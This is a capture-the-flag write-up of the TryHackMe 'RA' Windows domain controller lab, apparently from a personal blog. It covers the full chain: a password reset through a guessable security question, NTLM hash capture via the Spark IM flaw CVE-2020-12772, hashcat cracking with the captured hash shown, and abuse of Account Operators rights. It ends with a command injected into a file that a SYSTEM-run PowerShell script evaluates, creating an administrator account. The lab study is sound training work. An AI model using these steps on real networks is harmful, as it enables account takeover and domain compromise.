Try Hack Me Room — RA
Write-up on THM’s machine “RA”, Windows Domain Controller.
Disclaimer
This document contains materials / information that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Story
You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
Happy Hacking!
Reconnaissance
Used nmapAutomator to automate the process of recon/enumeration and here’s the summary of the output.
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5222/tcp open xmpp-client
5269/tcp open xmpp-server
7070/tcp open realserver
7443/tcp open oracleas-https
7777/tcp open cbt
9090/tcp open zeus-admin
9091/tcp open xmltec-xmlmail
Nmap done: 1 IP address (1 host up) scanned in 6.16 secondsPort 80 Enumeration
Before we dig deep into enumerating tcp/80, edit your /etc/hosts file and add the IP and dns name. Information could be obtained from your nmap scans.
DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
Reset Password Portal looks interesting but we have to find user(s) that can possibly lead us to our initial foothold.
Have some possible users that would could enumerate
Inspecting the Reset form further, we have some possible option that we could reset someone’s account
After further researching and several trial and errors as to which users can give us “something”, user Lily Levesque maybe is our hope. Tried Cewl — wordlist generator and grab possible usernames and wordlists from the site but struggled on resetting her account. Something about Lily and her pet ……
Saving Lily’s image gave us a default image name of “lilyleandSparky.jpq”.
After we resetting Lily’s account, I used smbclient to check her file and folders access.
Mapped ‘Shared’ folder, browsed through several folders including ‘Users’ folder, but did not see anything of interest.
Flag 1
Further enumeration
Since we have only the files / program above that stands out, Googling revealed the “spark” is an open Source, cross-platform IM client optimized for businesses and organizations.
smb: \> ls
. D 0 Fri May 29 20:45:42 2020
.. D 0 Fri May 29 20:45:42 2020
Flag 1.txt A 45 Fri May 1 11:32:36 2020
spark_2_8_3.deb A 29526628 Fri May 29 20:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 07:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 07:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 07:07:24 202015587583 blocks of size 4096. 10906613 blocks available
smb: \> get spark_2_8_3.deb
getting file \spark_2_8_3.deb of size 29526628 as spark_2_8_3.deb (2535.1 KiloBytes/sec) (average 2535.1 KiloBytes/sec)
smb: \>
Spark Vulnerability research
There’s also a write-up about CVE-2020–12772 as to how to grab the NTLM hashes @ https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
After downloading spark_2_8_3.deb from the host, I proceed on installing the app and see if we can login as Lily.
Logged in as Lily, not what :-)
Let’s fire-up our responder to see if we can get some hashes. First, need to figure out who can we send message…
Bit of trial and error finally got the hash
Next step is to figure out what mode is our captured hash so we can pass it on to hashcat and figure out Buse’s password. I’ve used Name-that-hash to determine what we have.
Based on the NTM, it is possible that we have 5600 NetNTLMv2. Next step is to use hashcat to identify the password
┌─[arcy24@parrot]─[~/Documents/thm/RA]
└──╼ $hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 5 4500U with Radeon Graphics, 2891/2955 MB (1024 MB allocatable), 2MCUMinimum password length supported by kernel: 0
Maximum password length supported by kernel: 256Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-SaltATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.Host memory required for this attack: 64 MBDictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 secBUSE::WINDCORP:b12d08385cdce9f6:2180b9f978a1e4ce8db4c5ab79568bdc:01010000000000000ee6ae89a60cd70182a847a45f8e325b000000000200060053004d0042000100160053004d0042002d0054004f004f004c004b00490054000400120073006d0062002e006c006f00630061006c000300280073006500720076006500720032003000300033002e0073006d0062002e006c006f00630061006c000500120073006d0062002e006c006f00630061006c000800300030000000000000000100000000200000b08e13e054dadfdd6eba40596d673f2daae925f4e7d16362efadab115da1c1c80a00100000000000000000000000000000000000090000000000000000000000:xxxxxxSession..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:b12d08385cdce9f6:2180b9f978a1e4ce8db...000000
Time.Started.....: Fri Feb 26 15:44:00 2021 (7 secs)
Time.Estimated...: Fri Feb 26 15:44:07 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 488.2 kH/s (3.67ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2959360/14344385 (20.63%)
Rejected.........: 0/2959360 (0.00%)
Restore.Point....: 2957312/14344385 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v10014318 -> uyab_cakepStarted: Fri Feb 26 15:43:05 2021
Stopped: Fri Feb 26 15:44:08 2021
Now that we have obtained the password for Buse, let’s use Evil-winrm to see if we can login and further enumerate.
Privilege Escalation
Flag 2
Further enumeration … go for root!!!
Checked different folders and files to see if we can pivot differently for priv access but did not get anywhere. Started poking around in the C:\scripts folder and here’s what I found.
*Evil-WinRM* PS C:\scripts> get-ChildItem | get-aclDirectory: C:\scriptsPath Owner Access
---- ----- ------
checkservers.ps1 BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...
log.txt BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullControl...*Evil-WinRM* PS C:\scripts>
checkservers.ps1
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
if($p)
{
# if the Host is available then just write it to the screen
write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
[Array]$available += $_
}
elseUnfortunately we can’t even read any of brittanycr’s files
*Evil-WinRM* PS C:\scripts> cd c:\Users\brittanycr
*Evil-WinRM* PS C:\Users\brittanycr> ls
Access to the path 'C:\Users\brittanycr' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\Users\brittanycr:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\brittanycr> more hosts.txt
Access is denied
At line:7 char:9
+ Get-Content $file | more.com
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
Cannot find path 'C:\Users\brittanycr\hosts.txt' because it does not exist.
At line:7 char:9
+ Get-Content $file | more.com
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Users\brittanycr\hosts.txt:String) [Get-Content], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommandDigging through Buse’s account
Account Operators
The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.
Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.
Since we have rights to change other user’s accounts, changed brittanycr’s password and logged back in user her account.
*Evil-WinRM* PS C:\> net user brittanycr 123467890!@#$% /domain
The command completed successfully.*Evil-WinRM* PS C:\>
Tried to add brittanycr to global IT group but got denied.
*Evil-WinRM* PS C:\Users\buse\Documents> net group IT brittanycr /add
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandErrorAccess is denied.
After changing brittanycr’s password, connecting via rdp or evil-winrm did not work. I did got stuck on this stage but just realized the checkservers.ps1 can run with NT AUTHORITY\SYSTEM access. However, brittanycr’s account have rights to modify the hosts.txt.
Conducted further research on net commands and other commands we can insert in the host.txt file to add a user in Administrator group. Several trial and error, net commands “net user Bugoks !QAZxsw /add;net localgroup Administrators Bugoks /add” worked for me.
Login via smbclient using brittanycr’s account. Download the hosts.txt file and append the net user command.
Upload the appended hosts.txt file
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.3 kb/s) (average 0.3 kb/s)
smb: \brittanycr\>I have to do a bit of trial and error modifying the hosts.txt file to add a user and put our new user to the local Administrator’s group.
┌─[arcy24@parrot]─[~/Documents/thm/RA]
└──╼ $evil-winrm -i 10.10.79.150 -u Bugoks
Enter Password:Evil-WinRM shell v2.3Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Bugoks\Documents> net user Bugoks
User name Bugoks
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires NeverPassword last set 2/28/2021 3:06:16 PM
Password expires 4/11/2021 3:06:16 PM
Password changeable 3/1/2021 3:06:16 PM
Password required Yes
User may change password YesWorkstations allowed All
Logon script
User profile
Home directory
Last logon NeverLogon hours allowed AllLocal Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
Flag 3
Lessons learned
- Automated tools such as WinPeas or exploit suggester may not be enough to give you hints for priv exec.
- Understanding powershell
- AD Windows Accounts
- net commands
References
